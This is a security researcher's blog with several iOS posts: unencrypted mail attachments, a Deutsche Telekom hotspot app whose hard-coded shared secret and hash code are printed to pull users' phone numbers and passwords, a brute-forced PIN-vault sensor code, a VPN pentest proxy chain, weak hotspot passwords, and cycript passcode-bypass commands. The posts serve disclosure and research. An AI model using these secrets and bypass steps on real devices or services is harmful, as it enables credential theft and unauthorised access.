Mittwoch, 23. April 2014

What Apple Missed to Fix in iOS 7.1.1

A few weeks ago, I noticed that email attachments within the iOS 7 are not protected by Apple's data protection mechanisms. Clearly, this is contrary to Apple's claims that data protection "provides an additional layer of protection for (..) email messages attachments".

I verified this issue by restoring an iPhone 4 (GSM) device to the most recent iOS versions (7.1 and 7.1.1) and setting up an IMAP email account1, which provided me with some test emails and attachments. Afterwards, I shut down the device and accessed the file system using well-known techniques (DFU mode, custom ramdisk, SSH over usbmux). Finally, I mounted the iOS data partition and navigated to the actual email folder. Within this folder, I found all attachments accessible without any encryption/restriction:

# mount_hfs /dev/disk0s1s2 /mnt2
# cd /mnt2/mobile/Library/Mail/

# xxd IMAP-MY_MAILADDRESS/INBOX.imapmbox/Attachments/4/2/my_file.pdf 
0000000: 2550 4446 2d31 2e34 0a25 81e2 81e3 81cf  %PDF-1.4.%......
0000010: 81d3 5c72 0a31 2030 206f 626a 0a3c 3c0a  ..\r.1 0 obj.<<.
0000020: 2f43 7265 6174 696f 6e44 6174 6520 2844  /CreationDate (D
0000030: 3a32 3031 3330 3830 3532 3034 3830 3329  :20130805204803)
0000040: 0a2f 4d6f 6444 6174 6520 2844 3a32 3031  ./ModDate (D:201
0000050: 3330 3830 3532 3034 3830 3329 0a2f 5469  30805204803)./Ti
0000060: 746c 6520 2852 2047 7261 7068 6963 7320  tle (R Graphics 
0000070: 4f75 7470 7574 290a 2f50 726f 6475 6365  Output)./Produce
0000080: 7220 2852 2033 2e30 2e31 290a 2f43 7265  r (R 3.0.1)./Cre
0000090: 6174 6f72 2028 5229 0a3e 3e0a 656e 646f  ator (R).>>.endo

To verify that data protection was actually enabled, I also tried to access the Protected Index file (email message database). As expected, access to that file was not permitted.

# xxd Protected\ Index
xxd: Protected Index: Operation not permitted

Note: I was also able to reproduce this issue on an iPhone 5s and an iPad 2 running iOS 7.0.4.

I reported these findings to Apple. They responded that they were aware of this issue, but did not state any date when a fix is to be expected. Considering the long time iOS 7 is available by now and the sensitivity of email attachments many enterprises share on their devices (fundamentally relying on data protection), I expected a near-term patch. Unfortunately, even today's iOS 7.1.1 did not remedy the issue, leaving users at risk of data theft. As a workaround, concerned users may disable mail synchronization (at least on devices where the bootrom is exploitable).

1 It turned out that POP or ActiveSync email accounts behave the same way.

Freitag, 24. Januar 2014

The Effects of Overhyped Usability

When Apps Get Out of (Privacy) Control 

Slow but steady, the everlasting trade-off between usability and security appears to reach a considerable peak within the mobile app ecosystem. Since "ease of use" has been one of the key drivers for designing mobile apps in the recent past, it's about time to pause for a moment and to rethink whether our strong expectations towards app usability may have gone too far. To demonstrate how our strong usability expectations are going to intensify the mobile privacy crisis, this blog entry describes one of my latest cases in which I noticed an app that automagically retrieves a user's login credentials from its backend. For convenience.

The Case of the Deutsche Telekom HotSpot Login App

According to the official App Store description, the HotSpot Login App by Deutsche Telekom assists users to connect to one of the public Telekom hotspots. It says "Telekom mobile customers can set up their credentials automatically with the app."

Figure 1: Automatic retrieval of login credentials by pushing the "Automatic setup" button.
The username is based on a user's phone number.

In practice, users just have to push the "Automatic setup" button within the account settings dialog. A few seconds later, the login form is magically filled with the corresponding hotspot credentials (see Figure 1). Noticeably, the username is based on a user's phone number, which actually shouldn't be accessible from an app at all due to iOS sandbox restrictions. So how did Telekom manage this? Using private API? In that case, how was it possible to bypass Apple's vetting process? Special treatment for mobile service providers? Far from it, as the following analysis will show.

By intercepting the cellular network traffic it could be easily determined that whenever the automatic setup button is pushed, the following HTTP request is issued to the system

GET /getCredentials?x-Hash=ad5af2d1ef8aead398cd132aa4d1479e07f43ac60cbeea3f73e45c9f96650f4e HTTP/1.1
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: de-de
Connection: keep-alive
x-Hash: ad5af2d1ef8aead398cd132aa4d1479e07f43ac60cbeea3f73e45c9f96650f4e
User-Agent: HotSpot%20Login/2.4.0 CFNetwork/672.0.8 Darwin/14.0.0

It should be noted that the only remarkable part about that request is an ominous hash value, which is placed in its parameter and header values. Obviously, that hash is meant to prevent fraudulent use of this web service.

This request resulted in the following server response:

HTTP/1.1 200 OK
x-Username: <PHONE_NUMBER>
Content-Length: 0
Content-Type: text/plain; charset=ISO-8859-1

It turned out that a user's credentials are disclosed within the two HTTP headers x-Password and x-Username, which, in turn, are used to fill the app's login form. This means that the initial assumption of private API usage to determine a user's phone number has proved to be false. Instead, a web service provided by Deutsche Telekom provides all the relevant data. In fact, this is not surprising as it should be easy for a mobile carrier to match a requester's IP address to their account information.

So far, the one and only requirement to query that web service is a single hash value, which is actually calculated inside the app. In more detail, the hash is calculated within the method getStringMax provided by the UserCredentialManager class. This method uses the device's current public IP address and appends a static "shared secret" value (ae2454ca2df8c8c3) to it. Finally, a SHA-256 hash value is computed of that assembled string (IP + shared secret) to legitimize the web service request.

Exploitation Scenarios

So, what does it all mean? When talking about risks, the good news is that the wlanauthenticate sytem is only accessible from the Deutsche Telekom cellular network. Moreover, the requester's IP address is used along with the hash value to finally authorize a request. Therefore, crawling user hotspot credentials on a large scale is not an option. However, the bad news is that any app can make use of that service to query the phone numbers of their users or, even worse, their hotspot password (limited to customers of Deutsche Telekom of course). For this, an app only needs to issue a single HTTP request as demonstrated above using the following Objective-C function to calculate the required hash value. In no time, any requesting app will be provided with the user's phone number and the hotspot password.

- (NSString*) calculateHash:(NSString *)ip
    NSString *sharedSecret = @"ae2454ca2df8c8c3";
    ip = [ip stringByAppendingString:sharedSecret];
    NSData *dataIn = [ip dataUsingEncoding:NSASCIIStringEncoding];
    uint8_t dataOut[CC_SHA256_DIGEST_LENGTH]={0};
    CC_SHA256(dataIn.bytes, dataIn.length,  dataOut);
    NSData *out=[NSData dataWithBytes:dataOut length:CC_SHA256_DIGEST_LENGTH];
    NSString *hash=[out description];
    hash = [hash stringByReplacingOccurrencesOfString:@" " withString:@""];
    hash = [hash stringByReplacingOccurrencesOfString:@"<" withString:@""];
    hash = [hash stringByReplacingOccurrencesOfString:@">" withString:@""];
    return hash;

This seems to be a great opportunity for the advertising industry as it allows not only to reliably track users based on their phone numbers, but also to extend spam activities to other channels like text messaging services. This could be the beginning of "Customers Who Frequently Used This App Also Used..." messages flooding mobile messenger networks. Or the other way round: Apps might harvest hotspot credentials to sell them on the black market. I'm not quite sure, which of these scenarios is worse...

Notwithstanding the above, such a precarious practice is questionable insofar as Apple has significantly ramped up efforts in recent years to restrict apps' overall capabilities to harm users' privacy. Removal of the Unique Device ID (UDID) or the WiFi MAC address, introducing loads of new entitlements to restrict access to private API within iOS 7, just to name a few. However, it just seems like a waste of efforts when a mobile service provider circumvents those restrictions by utilizing their exposed network position.

Reactions from the Deutsche Telekom CERT

For this reason, I contacted the Deutsche Telekom CERT at the beginning of November 2013 and responsibly disclosed my findings. I also sketched all the related privacy implications. They informed me at the end of November that the issues were still under investigation and provided me with a final reply at the end of December. Within that e-mail they stated that they weighed up the potential risk of abusing the web service against its enormous usability boost and decided to keep that function up running. Otherwise, the overall app usability would suffer significantly. They also pointed out that users would be at risk only when installing "malicious" apps from third-party marketplaces and it would be the users fault when not sticking to official App Store apps. On a side note, I was wondering since when Apple evaluates individual web service requests within their vetting process? Anyhow, they finally stated that "exploitation of this vulnerability would (at least) require special expertise and criminal energy". Duh!

PS: Within the last update of the HotSpot Login App the hash calculation method was renamed from the former name "getSecureHashForIP" to a more meaningless value of "getStringMax". Well enough.


At the very beginning of this analysis it turned out that the automatic setup procedure would require a cellular data connection (to enable the backend to match a requesters cellular IP address to their account information). This is ensured by the app class ReachabilityARC that will display an error message whenever setup is invoked from within a WiFi network. Clearly, this renders all well-known WiFi based network capture approaches useless. Thus, in order to inspect the app's traffic the cellular data connection has to be intercepted. This can be easily accomplished within iOS by setting up a specific APN (Access Point Name) payload that defines a reverse proxy (see Figure 2). Although those settings are not directly accessible from the iOS user interface, the Apple Configurator Application  allows creation of so called mobile configuration profiles, which in turn provide access to hidden settings like APN proxy configurations  etc. It should be noted that, in practice, it is recommended to redirect the intercepted proxy traffic back to the iOS device in order to deliver it to the backend systems. This ensures that all requests are in fact issued via the cellular network, which might prevent app malfunctions. For more information on how to easily proxy back to the device, please refer to my recent blog post "The Proxy Fight" .

Figure 2: Intercepting celluar network connections using a iOS mobile configuration profile

Montag, 29. Juli 2013

How to Easily Spot Broken Cryptography in iOS Applications

Behind the Scenes of iPIN Lite – A Secure PIN & Password Safe

Within one of my recent research projects on mobile application security, I reviewed some password managers for iOS devices from the Apple App Store. The primary goal of this study was to demonstrate the diverse possibilities of iOS runtime injection and how our new tool Snoop-it eases down security assessments of iOS applications.

Note: Snoop-it is a tool to assist dynamic analysis and blackbox security assessments of iOS applications by retrofitting existing apps with debugging and runtime tracing capabilities. It was introduced during the DeepSec Security Conference and is publicly available at (Cydia Repository:

Previous studies have indicated, that many of the available secure password managers aren’t as secure by design, as intended. In a study on “Secure Password Managers”, Andrey Belenko and Dmitry Sklyarov have shown that many mobile password managers fail to provide the claimed level of data protection.

One quite popular app that was not included within their study is “iPIN Lite - Secure PIN & Password Safe” by IBILITIES, INC. This app spotted my attention, not least because it provides an “innovative sensor keyboard” and “state-of-the-art encryption” using the “Advanced Encryption Standard and a key length of 256 bit” – so what could possibly go wrong?

Dynamic Analysis 

The typical approach which is chosen to analyze an iOS application dynamically, is to examine the app on a jailbroken device. This removes the limitations imposed by Apple, provides root access to the iOS operating system and enables access to the Objective-C Runtime.

Thus, after installing iPIN Lite (Version 2.27) from the Apple App Store on my testing device, I configured Snoop-it to get ready to run. During initialization of iPIN Lite, Snoop-it is transparently integrated using library injection techniques. At the same time, a webserver is started inside the app in order to make all debugging and runtime tracing capabilities of Snoop-it accessible via an easy-to-use graphical web interface.

After iPIN Lite has finished launching and the sensor keyboard (which is a special login view, more on this later) was displayed, I pointed my browser to the Snoop-it web interface.

One feature of Snoop-it is to monitor file system accesses of an app. During initialization of iPIN Lite several ViewControllers and resource files are loaded, obviously to present the login view. Less obvious, but even more interesting was one access to a file named iPinSecurityModel.dat which resides in the /Library/ipin_data/ folder of the application sandbox (see Figure 1).

Figure 1: Files accessed by iPIN Lite at startup

Although this file probably serves as a basis for the security model of iPIN Lite, it was not protected by Apple File Data Protection mechanisms (protection class NSFileProtectionNone). Consequently, one of the next steps was to look at the contents of this file (using Snoop-it it is as easy as double-clicking on the specific entry to download the file). Unfortunately, the contents of the security model file appeared to be in binary format, probably some kind of encoding or encryption. Worse luck! So what next?

Luckily, the characteristics of the Objective-C Runtime enable comprehensive dynamic analysis of running apps. One of the most important functions of the Objective-C Runtime is objc_MsgSend. This function serves as a central dispatcher and routes messages between existing objects. Accordingly, every method invocation in Objective-C results in one or more messages to that dispatcher. If we could intercept all messages to this dispatcher, we would get a very clear picture of the actual control flow and a clear vision of what is going on inside the app.

One solution for that could be to monitor all calls to objc_msgSend on a debugger level using gdb. This approach makes an awful lot of noise due to all the background activities of the runtime which are shown up as well. In consequence it’s really hard to figure out app specific calls.

A better approach would be to intercept messages to objc_msgSend within the runtime. On a runtime level, filters could be applied to focus on app specific classes and method invocations inside the actual app. Inspired by Aspective-C and Subjective-C we extended those existing solutions to consider penetration testing needs and integrated a powerful method tracing feature into Snoop-it.

Thus, in order to evaluate the encryption scheme, I switched over to the method tracing tab and examined the methods that were invoked during initialization of iPIN Lite. I was especially interested in the processing of the security model file, which has shown up in the file system access list earlier (see access to the file iPinSecurityModel.dat in Figure 1).

Indeed, as the tracing output reveals (see Listing 1), the security model file was accessed at the very beginning. In fact, the file was protected using a hard-coded cryptographic key that resides inside the application binary.

+ [iPinModel(0x90f68) initFromFile]
+ [iPinModel(0x90f68) securityModelFilePath]
+ [iPinModel(0x90f68) securityModelFilePath]
+ [PBKDF2(0x9124c) getKeyForPassphrase:], args: <__NSCFConstantString 0x92160: [initForWritingWithMutableData]>
+ [iPinModel(0x90f68) initSharedModelWithUnarchiver:withObjectKey:], args: <0x2002aef0>, <__NSCFConstantString 0x92150: iPINModel>
+ [iPinModel(0x90f68) sharedModel]
- [iPinModel(0x200e2130) initWithCoder:], args: <0x2002aef0>
- [iPinModel(0x200e2130) setSensorHash:], args: <__NSCFString 0x2002a630: 8CF37F50FB1A7943FBA8EAA20FFF1E56>
- [iPinModel(0x200e2130) setEncryptedSensorCode:], args: <__NSCFData 0x2002a540, length 16 bytes>
- [iPinModel(0x200e2130) setPasswordHash:], args: <__NSCFString 0x2002a470: 098F6BCD4621D373CADE4E832627B4F6>
- [iPinModel(0x200e2130) setEncryptedPassword:], args: <__NSCFData 0x2002a2d0, length 16 bytes>
- [iPinModel(0x200e2130) setFailedAttemptsCounter:], args: 0
Listing 1: Method tracing output of iPIN Lite – Part 1

According to the tracing output shown in Listing 1, the security model file contains hashes of a sensor-code (sensorHash) and a password (passwordHash) as well as an encrypted password string (encryptedPassword). These values are transferred into an instance of the “iPinModel” class. Presumably, these hashes will be used later on during authentication to verify the sensor-code or the password entered by the user. It’s quite questionable whether a key derivation function applied on a static string really makes sense :-)

Anyway, let’s take a quick look at this sensor-code: iPIN Lite provides an “innovative sensor keyboard” which consists of 9 touch-sensitive sensors (see Figure 2). This keyboard is supposed to provide “quick access to all your PINs - without any annoying and time-killing passwords.” The authentication is based on a geometrical shape or any individual sensor combination. Therefore, the “individual sensor code is calculated by the order in which (..) these sensors have been activated and deactivated”. By now, this looks like another showcase of the everlasting conflict between usability and security. Let’s see.

Figure 2: Sensor Keyboard of iPin Lite

As soon as one sensor is touched, its color is changed into blazing blue. In the background, the touch events are registered from the corresponding ViewControllers.

The following method trace (see Listing 2) shows, that the sensors are numbered consecutively from 10 to 90. A touch on the upper middle sensor corresponds to a value of 20. In the end, the values of all touched sensors are joined into one common sensor-code. On every touch, a MD5 hash is calculated from the current sensor-code and is compared to the sensorHash value (which was derived from the security model file). Consequently, the overall security of iPIN Lite solely depends on the strength of these sensor-codes, whose search space is in fact very limited. If we could guess the sensor-code, the security model of iPIN Lite would have been completely broken.

- [UISensorKeyboardImageView(0x200dc000) touched]
- [UISensorKeyboardImageView(0x200dc000) touch]
- [UISensorKeyboardImageView(0x200dc000) setTouched:], args: 1
- [UISensorKeyboardImageView(0x200dc000) numberOfTouches]
- [UISensorKeyboardImageView(0x200dc000) setNumberOfTouches:], args: 1
- [SensorKeyboardViewController(0x200c9a40) tock]
+ [iPinModel(0x90f68) sharedModel]
- [iPinModel(0x200e2130) sensorSoundTurnedOff]
- [SensorKeyboardViewController(0x200c9a40) input]
- [UISensorKeyboardImageView(0x200dc000) value]
- [SensorKeyboardViewController(0x200c9a40) setInput:], args: <__NSCFString 0x200dec80: 20>
- [LoginViewController(0x20093ce0) valueChanged:], args: <__NSCFString 0x200dec80: 20>
+ [CryptoUtils(0x90f54) md5:], args: <__NSCFString 0x200dec80: 20>
+ [iPinModel(0x90f68) sharedModel]
- [iPinModel(0x200e2130) sensorHash]
Listing 2: Method tracing output of iPIN Lite – Part 2

Attacking the Encryption Scheme 

Snoop-it provides a feature to invoke arbitrary methods at runtime. For this, Snoop-it queries the Objective-C Runtime for all available app classes and methods during startup. In addition, Snoop-it monitors initialization of each class and keeps track of all available instances in memory to invoke those instance methods later on. Thus, to determine the current sensorHash, I used that feature of Snoop-it and invoked the corresponding getter method of the iPinModel class. This returned me a hash value of 8CF37F50FB1A7943FBA8EAA20FFF1E56 (see Figure 3).

Figure 3: Determine the actual sensorHash from an instance of the iPinModel class

In order to attack the encryption scheme, I wrote a python script to brute force all possible sensor codes and to compare it against this sensorHash. After a few seconds, the script provided the correct sensor code sequence 10 20 30 60 90 (see Figure 4).

Output of the python script:
$ python -s 8CF37F50FB1A7943FBA8EAA20FFF1E56 
Sensor Hash: 8cf37f50fb1a7943fba8eaa20fff1e56 
Sensor Code: 1020306090 

Figure 4: Sensor Code Accepted

Finally, let’s see how the actual app data is decrypted. According to the output shown in Listing 3, the sensor-code is used to derive a key and to decrypt the encryptedPassword value which is stored in the security model file.

- [iPinModel(0x2007ee20) decryptPasswordWithKey:], args: <__NSCFString 0x2009d570: 1020306090>
- [iPinModel(0x2007ee20) encryptedPassword]
+ [PBKDF2(0xf824c) getKeyForPassphrase:], args: <__NSCFString 0x2009d570: 1020306090>
- [iPinModel(0x2007ee20) setPassword:], args: <__NSCFString 0x200f9d50: secretPassword>
- [iPinModel(0x2007ee20) calculatePasswordHash]
- [iPinModel(0x2007ee20) password]
Listing 3: Method tracing output of iPIN Lite – Part 3

Afterwards, the decrypted password (“secretPassword”) is used to derive another key, which is then used to decrypt the actual iPIN data (see Listing 4).

- [iPinModel(0x2007ee20) password]
+ [PBKDF2(0xf824c) getKeyForPassphrase:], args: <__NSCFString 0x200f9d50: secretPassword >
- [Pin(0x2002a7c0) initWithCoder:], args: <0x1f5a4320>
- [Pin(0x2002a7c0) setPinValue:], args: <__NSCFString 0x2002e3f0: 4711>
- [Pin(0x2002a7c0) setNote:], args: <__NSCFString 0x2002a760: Sample PIN Note>
- [Pin(0x1f5d1890) initWithCoder:], args: <0x1f5a4320>
- [Pin(0x1f5d1890) setPinValue:], args: <__NSCFString 0x200a5830: 1337>
- [Pin(0x1f5d1890) setNote:], args: <NULL>
- [iPINDataModel(0x2002ce80) setPinList:], args: <__NSArrayM 0x1f5c5330, size: 2>
- [iPinNavigationController(0x200317f0) init]
Listing 4: Method tracing output of iPIN Lite – Part 4

Lessons Learned

Once again, this case has demonstrated, that the security of an app is only as strong as its weakest link. Even if an app claims to protect your data using acknowledged encryption standards, it’s always worth to look behind the scenes. While this was quite time-consuming in the past, our new tool Snoop-it allows thorough analyses and on-the-fly manipulations of arbitrary iOS apps with an easy-to-use graphical user interface. Thus, reverse engineering of apps, bypassing client-side restrictions or unlocking additional features and premium content of apps is going to be a child’s play. Using Snoop-it, the attack surface of any iOS app can be explored more efficiently and even time-consuming steps, like evaluating encryption schemes, suddenly become possible in the twinkling of an eye.

Note: IBILITIES INC. was informed about these findings a few months ago. In the meantime, an updated version of iPIN was released.

The following video outlines the steps described above:

This video is also available at the following URL:

Thanks to Markus Troßbach for his close collaboration on developing Snoop-it!

Dienstag, 23. Juli 2013

The Proxy Fight, or How to Pentest an iOS App's Backend through an Existing VPN Connection

Have you ever been wondering how to pentest a mobile App backend that is only available through an existing VPN connection? This is often the case when it comes to assess the security of in-house developed enterprise Apps. Usually, company-owned devices first need to establish a VPN connection to the company's intranet in order to access data from internal backend systems. While this is a good design decision from a security perspective, it makes a penter's life a misery: As soon as a VPN connection is established, local LAN access is restricted. As a consequence, it is not as trivial as just configuring an HTTP proxy in your WiFi settings to man-in-the-middle between your App and the target web service.

To not waste too much time travelling in order to assess those web backends on site, the following steps provide you with a quick and comfortable solution to pentest iOS App's web services easily from remote locations, although an existing VPN connection is required.

Step 1 (on your host machine): Start your favorite intercepting proxy like Watobo, Burp, ZAP or the like (Port: 8080).

Step 2 (on your host machine): Configure your intercepting proxy to forward outgoing requests to an upstream HTTP proxy server using the following settings: Server: Port: 3128. In Burp e.g. these settings are defined within Options -> Connections -> Upstream Proxy Servers.

Step 3 (on your iDevice): Go to Cydia and install the package 3proxy.

Step 4 (on your iDevice): SSH into your iDevice and prepare a 3proxy configuration file:
iDevice:~ root# cat /var/root/3proxy.cfg
log /var/root/3proxy.log D
logformat "%d-%m-%Y %H:%M:%S %U %C:%c %R:%r %O %I %T"
proxy -p3128 -n
Step 5 (on your iDevice): Run 3proxy on your iDevice:
iDevice:~ root# 3proxy /var/root/3proxy.cfg &
[1] 11755
Step 6 (on your iDevice): Select your VPN configuration profile from the iOS Settings App (General -> VPN), scroll down to the Proxy settings and press "Manual". Here we need to fill in the following configuration: Server: Port: 8080 (this is the port on your host machine where your intercepting proxy is listening, see Step 1).

Step 7 (on your host machine): Now comes the most critical stage. As access to the local network is restricted whenever a VPN connection is established, we need to SSH into the iDevice over USB using usbmuxd. For this, get the usbmuxd source package, unpack and run
$ chmod +x ./usbmuxd-1.0.8/python-client/
$ ./usbmuxd-1.0.8/python-client/ -t 22:2222

Finally, run the following command to establish a SSH connection to your iDevice over USB and to setup all required SSH port forwardings:
$ ssh -p 2222 -L 3128: -R 8080: root@

Figure 1: Overview of the proxy chaining setup

Using this setup, every HTTP request originating from your iDevice is sent to the configured VPN proxy server first. The proxy server is nothing else than the intercepting proxy running on your host machine, just made accessible via the SSH tunnel over USB. After intercepting those HTTP requests, your intercepting proxy forwards them to the actual backend via the VPN connection using the 3proxy service running on your iDevice. From this point, you can proceed with your basic pentesting procedures and behave as if no VPN is present at all.

Please note that you might not be able to modify VPN proxy settings on your device, when the VPN profile was issued by a Mobile Device Management (MDM) solution. In this case, you need to adjust the VPN proxy configuration via the MDM interface. But beware of some MDM solutions that won't accept "localhost" (or as a valid proxy server setting.

Figure 2: Some MDM solutions like MobileIron are more restrictive on proxy server settings than iOS itself

Figure 2 shows the related error message, when localhost is used as a VPN proxy setting within MobileIron. This restriction can easily be bypassed by setting up an alias for localhost in your iDevice's /etc/hosts and by pointing your MDM to that alias.

Montag, 24. Juni 2013

The Case of iOS Wi-Fi Hotspots

Last week we published a study on the security of mobile hotspots. We found out, that Apple iOS generates weak default passwords, when an iPhone is used as mobile hotspot. This case serves as a perfect example, why it is always a good advice to replace initial default passwords by user-defined strong and secure passwords.


"Passwords have to be secure and usable at the same time, a trade-off that is long known. There are many approaches to avoid this trade-off, e.g., to advice users on generating strong passwords and to reject user passwords that are weak. The same usability/security trade-off arises in scenarios where passwords are generated by machines but exchanged by humans, as is the case in pre-shared key (PSK) authentication. We investigate this trade-off by analyzing the PSK authentication method used by Apple iOS to set up a secure WPA2 connection when using an iPhone as a Wi-Fi mobile hotspot. We show that Apple iOS generates weak default passwords which makes the mobile hotspot feature of Apple iOS susceptible to brute force attacks on the WPA2 handshake. More precisely, we observed that the generation of default passwords is based on a word list, of which only 1.842 entries are taken into consideration. In addition, the process of selecting words from that word list is not random at all, resulting in a skewed frequency distribution and the possibility to compromise a hotspot connection in less than 50 seconds. Spot tests show that other mobile platforms are also affected by similar problems. We conclude that more care should be taken to create secure passwords even in PSK scenarios."

For more information please refer to our technical report "Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots" (PDF) or the related page on our chair's website:

Media Coverage
  • Forbes: "Apple's iPhone Password Security Broken In 24 Seconds"
  • The Register: "Apple's screw-up leaves tethered iPhones easily crackable"
  • ars technica: "New attack cracks iPhone autogenerated hotspot passwords in seconds"
  • ZDNet: "Researchers able to predict Apple iOS-generated hotspot passwords"
  • H online: "Security issue in iOS Personal Hotspot"
  • Slashdot: "Researchers Crack iOS Mobile Hotspot Passwords In Less Than a Minute"
  • PC Magazine: "Researchers Crack iOS Personal Hotspot Passwords"
  • engadget: "Researchers able to predict iOS-generated hotspot passwords in less than a minute"
  • macrumors: "Researchers Crack iOS-Generated Hotspot Passwords in 50 Seconds"
  • Sophos Labs: "Anatomy of a cryptoglitch - Apple's iOS hotspot passphrases crackable in 50 seconds"
  • The Guardian: "iPhone passwords security"

Freitag, 30. November 2012

Presentation Slides: DeepSec, Vienna, 2012

Today, I gave a talk on pentesting iOS Apps at the DeepSec Security Conference in Vienna. Please find the presentation slides below.


Apple iOS Apps are primarily developed in Objective-C, an object-oriented extension and strict superset of the C programming language. Objective-C supports the concepts of reflection, also known as introspection. This describes the ability to examine and modify the structure and behavior (specifically the values, meta-data, properties and functions) of an object at runtime.

This talk discusses the background, techniques, problems and solutions to Objective-C runtime analysis and manipulation. It will be discussed how running applications can be extended with additional debugging and runtime tracing capabilities, and how this can be used to modify instance variables and to execute or replace arbitrary object methods of an App.

Moreover, a new framework to assist dynamic analysis and security assessments of iOS Apps will be introduced and demonstrated.


Freitag, 17. Februar 2012

iOS Runtime Injection Example #1

A common approach to implement access control within iOS apps is to display a lock screen and ask the user to enter a PIN. When the correct PIN is entered, the lock screen fades out and the main view of the application appears. By manipulating the iOS runtime it is often possible to circumvent such measures.

Let’s take SpringBoard1 as an example. The following cycript example demonstrates iOS runtime injection to bypass the iPhone/iPad passcode lock: First of all it’s necessary to replace the method "isPasswordProtected". After patching this method the SpringBoard assumes that there’s no passcode lock configured. All we have to do now is to remove the passcode lock screen by calling the method "unlockWithSound". Now we have full access to the home screen.

Important Note: When bypassing a passcode lock using this approach, Apple’s Data Protection still remains intact. Thus this technique does not reveal any new information compared to dumping raw data directly from the file system, but it demonstrates the diverse possibilities of iOS runtime injection.

Step 1: Attach cycript to the SpringBoard process:
iPhone:~ root# cycript -p SpringBoard

Step 2: Let’s see if the device is password protected:
cy# [SBAwayController.sharedAwayController isPasswordProtected]

Step 3: As a passcode lock is configured (return value of 1; see above) we have to replace the implementation of isPasswordProtected:
cy# SBAwayController.messages['isPasswordProtected'] = 
                                     function() { return NO; }

Step 4: Verification of the runtime patch:
cy# [SBAwayController.sharedAwayController isPasswordProtected]

Step 5: Finally we call the unlockWithSound method to access the home screen:
cy# [SBAwayController.sharedAwayController unlockWithSound:YES ]

Things could get even worse if an app would use its own encryption routines and a hardcoded encryption key within the app (imagine a “secure” password vault app). One approach could be to reverse engineer the app, extract the key out of the disassembly and decrypt the contents manually. But wouldn’t it be much easier to just manipulate the runtime, remove the lock screen and get the decryption done transparently. More on this topic to come soon. Stay tuned.

1 SpringBoard is the standard application that manages the iOS home screen.